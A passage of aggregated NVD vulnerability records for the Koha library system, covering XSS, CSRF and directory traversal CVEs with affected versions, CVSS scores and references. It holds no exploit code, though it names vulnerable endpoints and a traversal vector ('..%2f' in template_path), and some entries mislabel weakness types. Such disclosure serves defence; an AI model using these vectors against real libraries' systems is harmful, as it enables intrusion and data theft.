"Vendor Advisory"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-09-06 19:29
Modified
2024-11-21 03:40
Severity ?
Summary
KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in Multiple fields on multiple pages including /cgi-bin/koha/acqui/supplier.pl?op=enter , /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] , /cgi-bin/koha/serials/subscription-add.pl that can result in Privilege escalation by taking control of higher privileged users browser sessions. This attack appear to be exploitable via Victims must be socially engineered to visit a vulnerable webpage containing malicious payload. This vulnerability appears to have been fixed in 17.11.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086 | Exploit, Issue Tracking, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086 | Exploit, Issue Tracking, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3248F696-8686-4093-94DE-2D30EBE76239",
"versionEndIncluding": "16.11.13",
"versionStartIncluding": "16.11.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "20CF4C18-0421-40BA-BAFD-712040BE657A",
"versionEndIncluding": "17.05.05",
"versionStartIncluding": "17.05.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in Multiple fields on multiple pages including /cgi-bin/koha/acqui/supplier.pl?op=enter , /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] , /cgi-bin/koha/serials/subscription-add.pl that can result in Privilege escalation by taking control of higher privileged users browser sessions. This attack appear to be exploitable via Victims must be socially engineered to visit a vulnerable webpage containing malicious payload. This vulnerability appears to have been fixed in 17.11."
},
{
"lang": "es",
"value": "KOHA Library System en versiones 16.11.x (hasta la 16.11.13) y versiones 17.05.x (hasta la 17.05.05) contiene una vulnerabilidad Cross-Site Scripting (XSS) en m\u00faltiples campos de m\u00faltiples p\u00e1ginas, incluyendo /cgi-bin/koha/acqui/supplier.pl?op=enter, /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] y /cgi-bin/koha/serials/subscription-add.pl. Esto puede resultar en un escalado de privilegios obteniendo el control de las sesiones de navegaci\u00f3n de usuarios con mayores privilegios. El ataque parece ser explotable si la v\u00edctima es enga\u00f1ada mediante ingenier\u00eda social para que visite una p\u00e1gina web vulnerable que contiene una carga \u00fatil maliciosa. La vulnerabilidad parece haber sido solucionada en la versi\u00f3n 17.11."
}
],
"id": "CVE-2018-1000670",
"lastModified": "2024-11-21T03:40:22.397",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-06T19:29:00.627",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-09-06 19:29
Modified
2024-11-21 03:40
Severity ?
Summary
KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl Parameters affected: borrowernumber, amount, amountoutstanding, paid that can result in Attackers can mark payments as paid for certain users on behalf of Administrators. This attack appear to be exploitable via The victim must be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117 | Exploit, Issue Tracking, Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117 | Exploit, Issue Tracking, Patch, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3248F696-8686-4093-94DE-2D30EBE76239",
"versionEndIncluding": "16.11.13",
"versionStartIncluding": "16.11.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "20CF4C18-0421-40BA-BAFD-712040BE657A",
"versionEndIncluding": "17.05.05",
"versionStartIncluding": "17.05.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl Parameters affected: borrowernumber, amount, amountoutstanding, paid that can result in Attackers can mark payments as paid for certain users on behalf of Administrators. This attack appear to be exploitable via The victim must be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11."
},
{
"lang": "es",
"value": "KOHA Library System en versiones 16.11.x (hasta la 16.11.13) y versiones 17.05.x (hasta la 17.05.05) contiene una vulnerabilidad Cross Site Request Forgery (CSRF) en /cgi-bin/koha/members/paycollect.pl. Los par\u00e1metros afectados son: borrowernumber, amount, amountoutstanding y paid. Esto puede resultar en que los atacantes puedan marcar pagos como \"pagados\" para ciertos usuarios en nombre de los administradores. El ataque parece ser explotable si la v\u00edctima es enga\u00f1ada mediante ingenier\u00eda social para que haga clic en un enlace, normalmente por email. La vulnerabilidad parece haber sido solucionada en la versi\u00f3n 17.11."
}
],
"id": "CVE-2018-1000669",
"lastModified": "2024-11-21T03:40:22.230",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-06T19:29:00.503",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2017-07-21 14:29
Modified
2025-04-20 01:37
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| koha | koha | 3.14.00 | |
| koha | koha | 3.14.00 | |
| koha | koha | 3.14.00 | |
| koha | koha | 3.14.00 | |
| koha | koha | 3.14.01 | |
| koha | koha | 3.14.02 | |
| koha | koha | 3.14.03 | |
| koha | koha | 3.14.04 | |
| koha | koha | 3.14.05 | |
| koha | koha | 3.14.06 | |
| koha | koha | 3.14.07 | |
| koha | koha | 3.14.08 | |
| koha | koha | 3.14.09 | |
| koha | koha | 3.14.10 | |
| koha | koha | 3.14.11 | |
| koha | koha | 3.14.12 | |
| koha | koha | 3.14.13 | |
| koha | koha | 3.14.14 | |
| koha | koha | 3.14.15 | |
| koha | koha | 3.16.00 | |
| koha | koha | 3.16.00 | |
| koha | koha | 3.16.00 | |
| koha | koha | 3.16.00 | |
| koha | koha | 3.16.01 | |
| koha | koha | 3.16.02 | |
| koha | koha | 3.16.03 | |
| koha | koha | 3.16.04 | |
| koha | koha | 3.16.05 | |
| koha | koha | 3.16.06 | |
| koha | koha | 3.16.07 | |
| koha | koha | 3.16.08 | |
| koha | koha | 3.16.09 | |
| koha | koha | 3.16.10 | |
| koha | koha | 3.16.11 | |
| koha | koha | 3.20.00 | |
| koha | koha | 3.20.00 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:3.14.00:*:*:*:*:*:*:*",
"matchCriteriaId": "4B1B2C12-B1D5-4E52-858C-0B4F8E1BA02C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.00:alpha1:*:*:*:*:*:*",
"matchCriteriaId": "E450C73D-31D6-4BDF-ABB0-FBB15492EA3F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.00:alpha2:*:*:*:*:*:*",
"matchCriteriaId": "A32E9045-72AD-4659-B62A-2900EA460E91",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.00:beta:*:*:*:*:*:*",
"matchCriteriaId": "BC44DA27-4C55-4EE8-BA43-2BEC87DB3FED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.01:*:*:*:*:*:*:*",
"matchCriteriaId": "EC10597A-43BC-4CC1-816A-EBB2CFD11FE5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A36ADA58-0554-4CA7-A99A-FA9EBB9A9FF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.03:*:*:*:*:*:*:*",
"matchCriteriaId": "D2CE5A96-7210-4911-A06F-F1AACF0F4C6E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.04:*:*:*:*:*:*:*",
"matchCriteriaId": "06635AE0-F61A-4599-BE50-6E3642308FDC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.05:*:*:*:*:*:*:*",
"matchCriteriaId": "2B17348C-4474-4F39-8399-F8558E4E3C22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.06:*:*:*:*:*:*:*",
"matchCriteriaId": "72C16BBA-615E-4FD9-9D78-AA8879A3B7F0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.07:*:*:*:*:*:*:*",
"matchCriteriaId": "782C4424-4929-4B36-AF27-72F6AF5314C2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.08:*:*:*:*:*:*:*",
"matchCriteriaId": "3B779311-23F0-4D2A-88AD-2434831F2664",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.09:*:*:*:*:*:*:*",
"matchCriteriaId": "A04BD9B6-4820-4713-86C1-332A2402DB66",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.10:*:*:*:*:*:*:*",
"matchCriteriaId": "B8661D5D-A7BB-4370-83F6-C25F4F343875",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.11:*:*:*:*:*:*:*",
"matchCriteriaId": "2B63D59F-E9FB-4B4B-BE3D-0D5B4042C0D9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.12:*:*:*:*:*:*:*",
"matchCriteriaId": "B55D4B73-6F7D-4FDE-AD7D-918D3839677B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.13:*:*:*:*:*:*:*",
"matchCriteriaId": "A9032F10-0CCD-49C4-B336-5657E501FCD5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.14:*:*:*:*:*:*:*",
"matchCriteriaId": "1F5EB1BA-F905-4F12-9AE4-577A9F08D48E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.14.15:*:*:*:*:*:*:*",
"matchCriteriaId": "5FAC17B4-2903-4BAA-B3A9-5DDD8DC37647",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.00:*:*:*:*:*:*:*",
"matchCriteriaId": "D077FDF3-B2BE-44DC-8473-6B0C1DE6B68D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.00:beta:*:*:*:*:*:*",
"matchCriteriaId": "E9B749AC-8BD2-4668-85F0-5E20E7F5A820",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.00:pkg:*:*:*:*:*:*",
"matchCriteriaId": "1CBB8838-C0D6-4BA5-9C03-50BEFB8636DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.00:rc:*:*:*:*:*:*",
"matchCriteriaId": "06C2A6E3-F6BC-4A48-BC44-95426DBD82D2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.01:*:*:*:*:*:*:*",
"matchCriteriaId": "89B1D91F-56DA-4C7A-BE59-0CB88608C675",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.02:*:*:*:*:*:*:*",
"matchCriteriaId": "EB6206E8-DFA3-40DC-9C46-A4322829656C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.03:*:*:*:*:*:*:*",
"matchCriteriaId": "979FE2FA-59C5-439A-BA73-898270752FEA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.04:*:*:*:*:*:*:*",
"matchCriteriaId": "6D6540C8-91C9-4FA2-8422-2B9A7C8EC28F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.05:*:*:*:*:*:*:*",
"matchCriteriaId": "77B040B5-B0CD-4BC8-ACBF-8A0DE6BA5060",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.06:*:*:*:*:*:*:*",
"matchCriteriaId": "BE2EC9D9-045D-439F-9AA4-966C9144C38D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.07:*:*:*:*:*:*:*",
"matchCriteriaId": "63CF6430-EB39-4732-AD38-4644676629C7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.08:*:*:*:*:*:*:*",
"matchCriteriaId": "2BC1D87F-FECB-42AB-A2EF-07CBBE1177E5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.09:*:*:*:*:*:*:*",
"matchCriteriaId": "7229A6EE-B88C-497F-817F-9B1F8D5E3246",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EEDBB2C2-7153-4917-AE40-DC53DBFE9EFF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.16.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0797657C-570C-47F7-9C77-4E7DF864DDB2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.20.00:*:*:*:*:*:*:*",
"matchCriteriaId": "6FCCFB3F-92E1-4C1E-8794-FD23A4DE6D59",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.20.00:beta:*:*:*:*:*:*",
"matchCriteriaId": "74008064-906E-4674-8406-70C91A0AEAE5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name."
},
{
"lang": "es",
"value": "Hay una vulnerabilidad de tipo Cross-Site Scripting (XSS) en la biblioteca opac-addbybiblionumber.pl en Koha versi\u00f3n 3.14.x anterior a 3.14.16, versi\u00f3n 3.16.x anterior a 3.16.12 y versi\u00f3n 3.20.x anterior a 3.20.1, permite a los atacantes remotos inyectar script web o HTML arbitrario por medio de un nombre de lista creado."
}
],
"id": "CVE-2015-4639",
"lastModified": "2025-04-20T01:37:25.860",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-07-21T14:29:00.710",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
},
{
"source": "cve@mitre.org",
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "cve@mitre.org",
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "cve@mitre.org",
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://koha-community.org/security-release-koha-3-20-1/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-09-17 07:15
Modified
2024-11-21 08:40
Severity ?
3.5 (Low) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Summary
A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@vuldb.com | https://vuldb.com/?ctiid.239866 | Third Party Advisory | |
| cna@vuldb.com | https://vuldb.com/?id.239866 | Third Party Advisory | |
| cna@vuldb.com | https://www.youtube.com/watch?v=b5107YkpgaM | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://vuldb.com/?ctiid.239866 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://vuldb.com/?id.239866 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.youtube.com/watch?v=b5107YkpgaM | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FF9BC848-073A-4AB2-8ADF-3EDA92766E4A",
"versionEndIncluding": "23.05.03",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability."
},
{
"lang": "es",
"value": "Se ha encontrado una vulnerabilidad en KOHA hasta el 23.05.03. Se ha declarado como problem\u00e1tica. Esta vulnerabilidad afecta a c\u00f3digo desconocido del archivo /cgi-bin/koha/catalogue/search.pl del componente MARC. La manipulaci\u00f3n conduce a cross site scripting. El ataque puede iniciarse de forma remota. El exploit ha sido revelado al p\u00fablico y puede ser utilizado. VDB-239866 es el identificador asignado a esta vulnerabilidad."
}
],
"id": "CVE-2023-5025",
"lastModified": "2024-11-21T08:40:55.030",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-09-17T07:15:10.153",
"references": [
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.239866"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.239866"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.youtube.com/watch?v=b5107YkpgaM"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.239866"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.239866"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.youtube.com/watch?v=b5107YkpgaM"
}
],
"sourceIdentifier": "cna@vuldb.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "cna@vuldb.com",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-10-18 21:29
Modified
2024-11-21 02:31
Severity ?
Summary
Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
"versionEndExcluding": "3.14.16",
"versionStartIncluding": "3.14.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
"versionEndExcluding": "3.16.12",
"versionStartIncluding": "3.16.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E6E51D4D-9FD8-44A8-8FB0-4880927429D1",
"versionEndExcluding": "3.18.08",
"versionStartIncluding": "3.18.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3EBE685F-DE28-42F4-A071-0A14DE61D0C0",
"versionEndExcluding": "3.20.01",
"versionStartIncluding": "3.20.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades Cross-Site Scripting (XSS) en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten que atacantes remotos lean archivos arbitrarios mediante un ..%2f (punto punto barra cifrada) en el par\u00e1metro template_path en (1) svc/virtualshelves/search o (2) svc/members/search."
}
],
"id": "CVE-2015-4632",
"lastModified": "2024-11-21T02:31:26.580",
"metrics": {
"cvssMetricV2": [
{
